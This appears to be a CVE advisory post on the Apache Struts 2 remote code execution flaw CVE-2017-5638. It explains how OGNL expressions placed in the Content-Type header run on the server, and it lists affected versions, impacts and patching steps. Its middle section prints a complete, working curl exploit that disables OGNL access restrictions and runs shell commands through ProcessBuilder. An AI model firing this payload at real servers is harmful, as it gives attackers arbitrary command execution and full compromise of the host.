Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

By /

Listen to this Post

The CVE-2017-5638 vulnerability in Apache Struts 2 is a critical remote code execution flaw stemming from flawed error handling in the Jakarta Multipart parser. The exploit mechanism involves a maliciously crafted `Content-Type` HTTP header. When a request with a specially crafted header is sent to a Struts 2 server, the framework attempts to process it for file uploads. Due to improper validation, the erroneous header triggers an error that is passed to the `buildErrorMessage` function. This function utilizes the Java Expression Language (OGNL) to construct the error message. An attacker can embed OGNL expressions within the `Content-Type` header itself. Because the framework evaluates these expressions unsandboxed during the error message generation, the embedded malicious OGNL code is executed on the server with full application privileges. This allows an attacker to run arbitrary operating system commands, leading to complete compromise of the host.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability : Remote Code Execution

Severity: Critical

date: 2017-03-07

Prediction: Patch Available

What Undercode Say:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://vulnerable-server.com/struts2-blank/example/HelloWorld.action`

How Exploit:

Craft malicious Content-Type header.

Send HTTP request.

OGNL expression execution.

Arbitrary command injection.

Complete system compromise.

Protection from this CVE

Upgrade Struts immediately.

Apply patch S2-045.

Filter malicious Content-Types.

Use Web Application Firewall.

Impact:

Remote Code Execution.

Full System Access.

Data Breach Potential.

Service Disruption.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top